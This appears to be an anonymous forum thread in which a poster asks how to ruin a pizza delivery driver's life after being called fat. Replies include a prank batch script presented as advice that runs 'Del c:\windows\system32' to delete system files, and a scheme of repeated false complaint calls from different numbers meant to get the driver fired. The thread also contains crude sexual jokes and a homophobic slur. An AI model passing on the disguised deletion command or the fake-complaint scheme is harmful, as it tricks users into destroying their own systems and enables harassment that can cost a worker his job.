The pizza guy just called me fat. How can I ruin his life?

The pizza guy just called me fat. How can I ruin his life?

Eat less pizza.

>cum in dollar bill
>fold up
>"enjoy your tip"

By going into Notepad and typing the following

@echo off
Del c:\\windows\system32

Now save that shit as a .bat file and run it

Stop eating pizza.


eat more pizza and dont tip

he still has to deliver them but for free

Lose weight.

Order 50 pizzas and then don't tip him
Die from fatness overload
That'll sure show him

Offer to eat his ass.

Keep calling the place he works and say he drives recklessly. Use different phone numbers and make it sound like its a bunch of different people saying it. I work at dominos, a guy got fired for this.

it says the specified path is invalid

call the pizza place and tell them he was rude to you

You could just call the store and tell the manager he called you fat.
That's what most adults would do.
You'll probably get free food out of it.
You'll probably get free spit in it too.

It says: "zsh: command not found: @echo"

what's doing on here?

there is one \ too much.

that means you just got computer AIDS, bud

what in tarnation? my computer aint a fuckin homo

it still says the specified path is invalid

true enough it ain't, but it fucked a monkey and now you payin' for that, homeboy

You can get aids from sharing needles.

Talk to your computer about drugs and how harmful they can be.

You seem to be at an impasse.
You are fat enough to have someone bring you pizza, but he is lame enough to bring pizzas to fat people for a living.